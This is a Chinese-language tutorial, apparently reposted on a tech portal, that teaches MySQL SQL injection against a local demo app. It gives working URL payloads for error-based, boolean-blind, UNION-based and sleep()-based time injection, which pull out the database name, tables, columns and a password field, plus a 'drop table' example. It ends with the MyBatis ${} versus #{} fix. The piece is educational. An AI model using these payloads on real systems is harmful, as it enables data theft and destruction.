您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

手把手教你SQL注入

时间:2020-04-14 19:36:07  来源:  作者:

本文主要讲SQL注入基础教程的,关注我并私信,我把这份教程发给你。

什么是SQL注入?

SQL注入指的数据库将用户输入的数据当作SQL语句执行,从而对数据库进行任意的操作达到攻击的目的。这里的“用户”一般是指发现网站漏洞并构造合法的SQL语句对网站进行攻击的人。

怎么导致SQL注入?

SQL注入有两个关键的条件:用户能够控制输入、代码中SQL语句对用户输入的数据进行拼接。如下:

String sql="select * from user where address='" + request.getparameter("address") + "'"

上面的程序满足SQL注入的两个关键条件,参数name是用户输入的,SQL查询语句是经过拼接的,假设用户输入“深圳”,那么将会执行下面的SQL语句:

select * from user where address='深圳'

假设用户输入下面语句:

深圳';drop table user --

那么将会执行如下的SQ L语句:

select * from user where address='深圳';drop table user --'

明明只是想执行普通的SQL查询语句,变成执行删除数据库的表的SQ L语句。SQ L注入可以造成数据泄露、系统权限被控制等恶劣的后果。

MySQL注入基础

保存数据库库表的相关信息的库表

攻击者使用SQ L注入主要是为了获取网站相关的信息,这些数据保存在数据库表中,在MySQL中,默认库名为information_schema的数据库保存着MySQL相关的信息,其中有三个重要的表名,分别是schemata、tables、columns。

schemata表中保存着用户创建的所有数据库的相关信息,包括数据库名称、数据库默认的字符类型等信息等。记录这些数据库名称的字段为SCHEMA_NAME。

tables表中保存着用户创建的所有表的相关信息,包括数据库名称、表名、、表的类型、表的引擎、表的创建时间、表的更新时间等信息,记录数据库名称和表名的字段分别为TABLE_NAME、TABLE_SCHEMA。

columns表中保存着用户创建的所有表字段相关的信息,包括数据库名称、表名以及字段名称等相关信息。记录数据库名称、表名和字段名称的字段为TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME。

重要的函数

database():数据库名称,获取当前网站使用的数据库。

version():当前数据库的版本,获取当前网站使用的数据库版本,有些漏洞是跟版本有关系的。

user():当前MySQL的登录用户,通过用户的权限对数据库进行何种操作。

注释

在MySQL中注释符有三种:# 注释、--空格 注释、/*注释*/ ,攻击者通过注释将原有SQL语句中的一部分注释掉,换成攻击者输入的SQL,从而到达攻击的目的。

根据上述讲解的一些基础信息,当攻击者成功注入的时候,就可以轻易地获取到所有数据库相关的信息,这些Mysql注入的基础信息十分重要,在下面的讲解中将会用到这些基础知识。

案列

有了上述的基础知识,我们来看一个SQL注入的案列,当请求链接:http://localhost:8080/user/name?name=lingheng' 时,数据库将会执行下面SQL语句:

select * from t_person where Fname='lingheng''

当参数name=lingheng' 时,上述的SQL语句是不规范的,所以会返回错误:

手把手教你SQL注入

服务器抛出异常

由于SQL语句中多了一个单引号" ' ",数据库执行错误,服务器直接返回错误的信息。从上图的错误信息中可以清楚的看到执行的SQL语句,以及网站使用的数据为 MySQL , 错误的信息回显在网页上会给攻击者提供必要的攻击信息,方便攻击者构造SQL注入语句进行攻击。

注入的类型

SQL注入主要有两种:盲注和时间注入。

盲注

当网站没有错误回显,攻击者缺少重要的信息进行攻击,但并不是无法进行攻击,攻击者通过构造简单的SQL语句来测试网页是否发生变化,从而判断SQL语句是否执行了,这就是所谓的盲注。

比如,如下的请求链接:

http://localhost:8080/user/name?name=lingheng

执行的SQ L语句为:

select * from t_person where Fname='lingheng'

服务器成功返回查询的结果:

手把手教你SQL注入

查询结果

可以构造如下参数进行请求:

http://localhost:8080/user/name?name=lingheng' and 1=2 %23

数据库实际执行的SQL语句如下:

select * from t_person where Fname='lingheng' and 1=2 #'

%23是在浏览器中被解析为注释符 #,注释符将后面的SQL语句注释掉。I=2这个条件为假,SQL语句查询的结果永远为空,服务器永远不会返回结果,攻击者得到一个空的页面或者是具有错误信息的页面。

攻击者还可以构造如下参数进行请求:

http://localhost:8080/user/name?name=lingheng' and 1=1 %23

实际执行的SQL语句为:

select * from t_person where Fname='lingheng' and 1=1 #'

攻击者构造1=1进行请求时,得到结果跟参数name=lingheng一样。由于构造 and 1=1 和and 1=2 进行请求,得到的结果不一样,说明这个链接存在SQL注入。这就是盲注的基本测试方法以及基本的原理。

order by 测试表的字段个数

当发现有SQL注入漏洞时,如何进一步获取更多的数据库信息呢?

当发现有SQL注入时,可以使用order by进行测试表的字段个数。

构造的请求链接为:

http://localhost:8080/user/name?name=lingheng' order by 4 %23

上述请求实际执行的SQL语句为:

select * from t_person where Fname='lingheng' order by 4 #'

order by 4 的意思是根据第四个字段进行排序,当请求结果返回正常时,说明表的字段个数是少于4的。将order by 4 换成order by 5 进行请求,发现请求时返回的结果是错误的,那么说明表的字段个数是小于5的,根据order by 4 和order by 5的两个构造条件返回的结果,可以判断这个表的字段个数为4。order by 5的请求结果如下:

手把手教你SQL注入

order by 5的请求结果

由于网页的请求结果是显示在页面上的,所以可以结合 union 进行下一步的攻击,由于知道表的字段个数为 4 ,所以可以构造如下的链接:

http://localhost:8080/user/name?name=' union select 1,2 ,3,4  %23

实际执行的SQL语句为:

SELECT * FROM t_person where Fname ='' union select 1,2 ,3,4 #'

得到的请求结果为:

手把手教你SQL注入

 

由于数据库中没有name=‘’的记录,所以会返回union select 查询的结果。接下来可以在2、3的位置使用database()、user()或者version()进行构造请求链接:

http://localhost:8080/user/name?name=' union select 1,database() ,user(),4  %23

实际执行的SQL语句为:

SELECT * FROM t_person where Fname ='' union select 1,database() ,user(),4 #'

得到的结果如下图所示:

手把手教你SQL注入

 

从上图可以看出,database()的结果是数据库的名称为test,当前登录的MySQL的用户是root。在MySQL 注入基础部分,我们知道有MySQL的information_schema数据库中有三个比较重要的表:schemata、tables、columns。这三个表保存着数据库名称、表名以及表的字段名等信息。当获取到数据库名称后,可以构造如下的请求链接进行获取表名:

http://localhost:8080/user/name?name=' union select 1,(select table_name from information_schema.tables
where table_schema='test' limit 0,1) ,3,4  %23

实际的SQL执行语句为:

SELECT * FROM t_person where Fname ='' union select 1,(select table_name from information_schema.tables  
                                                       where table_schema='test' limit 0,1) ,3,4 #'

将union select 查询中 2 的位置换成了如下SQL语句:

select table_name from information_schema.tables where table_schema='test' limit 0,1

上述SQL语句是根据数据库的名称查询数据库的表名,最多返回一个表名。如果查询的数据库中有多个表名,可以利用limit进行限制返回,limit 1,1 返回第二个表名。构造的请求返回的结果如下:

手把手教你SQL注入

 

可以看到返回的数据库的表名为t_person,知道数据库的名称和表名就可以构造请求链接查询表的字段名,也是在union select 中 2 的位置换成如下SQL语句:

select column_name from information_schema.columns
where table_schema='test' and table_name='t_person' limit 0,1

实际执行的SQL语句为:

SELECT * FROM t_person where Fname ='' union select 1,(select column_name from information_schema.columns
                                                       where table_schema='test' and table_name='t_person' limit 0,1) ,3,4 #'

查询的结果为:

手把手教你SQL注入

 

从上图可以看到第一个字段名字为Fid,查询第二个字段名将imit 0.1改为limit 1,1 就可以了。通过查询得到表的字段名为:Fid、Fname、Fpass_word、Fsex。通过数据名称、表名以及字段名,就可以将数据中的数据数据查出来,将union select 中的 2 位置换成如下SQL语句:

select Fpass_word from test.t_person limit 0,1

根据上述的SQL语句就可以查询字段对应的数据了,其他字段的数据也可以构造上述的查询语句进行查询。现在攻击者没有权限却获取了数据库的名称、表名、字段名以及数据库中的数据,这对于网站来说是一件很危险的事。

时间注入

时间注入指的是攻击者根据SQL语句执行的时间长短变化来判断是否注入语句是否执行成功。

在MySQL中,bechmark()函数的作用是可以使同一个函数执行若干次,从而数据库执行的时间变长。如下:

SELECT BENCHMARK(10000000,ENCODE("hello","world"))
> OK
> 时间: 7.411s

执行10000000次ENCODE("hello","world")函数,耗时7.411s,根据BENCHMARK函数执行的次数,SQL执行的时间也会变化,这样就可以利用这个时间变化进行判断是否具有注入的漏洞。另外,还可以根据sleep()函数来测试是否具有漏洞。sleep()函数经常与if条件语句一起使用,如下:

-- 数据库名称的长度大于1,则休眠五秒,否则返回1。
if (length(database())>1,sleep(5),1) 
-- 如果数据库名的第一位字母是s,则睡眠5秒,否则返回1
if (substr(database(),1,1)='s',sleep(5),1)
上述SQL语句根据if语句中条件进行判断,如果SQL查询时间比sleep中的时间稍微长一点,那么就存在漏洞。
下面来看下具体的时间注入案例,构造请求链接:
http://localhost:8080/user/name?name=lingheng'
and if (length(database())>1,sleep(5),1) %23
实际执行的SQL语句为:
SELECT * FROM t_person where Fname ='lingheng'
and if (length(database())>1,sleep(5),1) #'
手把手教你SQL注入

 

在浏览器中按F12进行调试,就可以看到这次请求耗时5秒多。在sleep函数中换几个不同的数字测试,如果每次返回结果的时间都不一样,那么说明注入是成功的。

当可以判断进行时间注入,接下来也可以按照盲注的方法进行获取数据库的其他数据。

Mybatis注入分析

在Mybatis中,使用XML文件进行SQL语句的管理,有两种语法对输入的参数进行绑定,当 ${} 语法时,Mybatis会直接将输入原封不动进行绑定,也就是说直接将SQL语句与原始字符串拼接在一起。而本教程中的注入原因就是使用${}进行绑定,所以才导致SQL注入,具体的XML位置如下:

<select id="selectByName" parameterType="JAVA.lang.String" resultMap="BaseResultMap" >
    SELECT * FROM  t_person where Fname ='${name}'
  </select>

当使用 #{} 语法时,Mybatis 会自动生成 PreparedStatement ,使用参数绑定 ( ?) 的方式来设置值,带占位符 ( ? ) 的 SQL 语句只会被编译一次,之后执行只是将占位符替换为用户输入,并不会再次编译/解释,因此从根本上防止了 SQL 注入问题。而在 SQL 注入中,用户的输入是作为 SQL 指令的一部分,会被数据库进行编译/解释执行。

上面的教程主要是利用手工进行注入,相对来说是比较耗时,以及效率比较低的,SQLMap是自动SQL注入和数据库接管工具,支持Mysql、Oracle, PostgreSQL, Microsoft SQL Server等多种数据库。有兴趣的可以直接使用SQLMap进行SQL的注入学习。



Tags:SQL注入   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
2021-11-26  Tags: SQL注入  点击:(21)  评论:(0)  加入收藏
本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
2021-10-19  Tags: SQL注入  点击:(52)  评论:(0)  加入收藏
(一)SQL注入。1.如何理解SQL注入? SQL注入是一种将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手法。2.SQL注入是如何产生的? web开发人员无法保证所有的输入...【详细内容】
2021-09-17  Tags: SQL注入  点击:(47)  评论:(0)  加入收藏
一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
2021-09-17  Tags: SQL注入  点击:(67)  评论:(0)  加入收藏
前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
2021-08-26  Tags: SQL注入  点击:(60)  评论:(0)  加入收藏
前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
2021-08-13  Tags: SQL注入  点击:(66)  评论:(0)  加入收藏
1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
2021-08-04  Tags: SQL注入  点击:(74)  评论:(0)  加入收藏
0&times;00:前言对于MYSQL知识的一个初总结 0&times;01:正文 MYSQL数据库特性1.Mysql数据库默认不区分大小写,利用此特性可以进行大小写过正则匹配,举个简单的例子,有的题目中只...【详细内容】
2021-07-29  Tags: SQL注入  点击:(88)  评论:(0)  加入收藏
在本地搭建服务器,httpd-vhosts.conf 中设置本地绑定的域名: 其中,zzzphp为下载的zzzphp cms的内容。然后,本机上的zzzphp cms的目录结构为如下: 在按照要求安装好cms后,本地cms的...【详细内容】
2021-07-16  Tags: SQL注入  点击:(80)  评论:(0)  加入收藏
得到一个像原来老师一样督促你、关心你的人很难。。。---- 网易云热评一、常用命令及函数1、order by排序,获取数据有几个字段,后面小于等于字段数,都会返回结果,大于字段数返回...【详细内容】
2021-05-13  Tags: SQL注入  点击:(224)  评论:(0)  加入收藏
▌简易百科推荐
在最近的一波攻击中,黑客利用多个插件中未修补的漏洞攻击了 160 万个 WordPress 网站。 易受攻击的插件对 WordPress 网站产生了的巨大攻击数据。 Wordfence 最近发现 WordPr...【详细内容】
2021-12-16  蚁安    Tags:WordPress   点击:(9)  评论:(0)  加入收藏
事件起因从安全分析系统里面发现一条带有病毒的下载,然后针对这条记录展开了一系列的分析分析过程1.登录到被感染服务器,查看系统状况,hadoop 这个用户在 2020/6/18 20:32 从这...【详细内容】
2021-11-23  Z2990Lig    Tags:SSH   点击:(32)  评论:(0)  加入收藏
1、除了服务器需要用的一些正规软件,其它都不要安装。2、在用户中把administrator改名,这样做的目的是即使对方暴破了我们的密码用户名也不容易猜住,相当于又加了一道关卡。...【详细内容】
2021-11-01  IT小哥吧    Tags:服务器   点击:(37)  评论:(0)  加入收藏
账户安全(1)更名administrator本地用户并禁用guest账户步骤:点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组” (2)设定账户锁定策略尝试5次失败...【详细内容】
2021-10-12  Kali与编程  今日头条  Tags:Windows主机   点击:(62)  评论:(0)  加入收藏
本文主要介绍以Microsoft的Windows Server 2019 ,版本:Datacenter(Domain Controller)安全加固保护.企业随着规模不断扩大,业务增多,信息安全建设是企业里一条只有重点没有终点...【详细内容】
2021-09-17  Vireshark    Tags:服务器安全   点击:(64)  评论:(0)  加入收藏
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享3:IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?di...【详细内容】
2021-09-16  网络说安全    Tags:系统安全   点击:(86)  评论:(0)  加入收藏
昨天一个老哥找到我,说他的服务器这几天一直被CC攻击,问我这边有没有什么解决的方法? 近年来,网络攻击事件越来越频繁,最常见的就是CC攻击和DDOS攻击,主要的区别就是针对的对象不...【详细内容】
2021-09-10  小蚁GDRAGON    Tags:cc攻击   点击:(58)  评论:(0)  加入收藏
网站页面上的登录操作,通常都是输入帐号密码,传输至网站后台验证。在网站页面、数据传输中,通过技术手段,都可以得到用户输入的信息,并可以修改,从而发起网络攻击。典型的如:使用自...【详细内容】
2021-08-30  修丹道的程序猿    Tags:登录方式   点击:(62)  评论:(0)  加入收藏
网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞,这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】
2021-08-12  零日时代    Tags:漏洞   点击:(66)  评论:(0)  加入收藏
001暴力破解1. 指定用户名爆破密码传统型爆破思路,用户名可以通过猜测或者信息收集获得。猜测:admin、网站域名等信息收集:新闻发布人、whoami等2. 指定密码爆破用户名如果是后...【详细内容】
2021-07-23  KaliMa  今日头条  Tags:登陆框   点击:(85)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条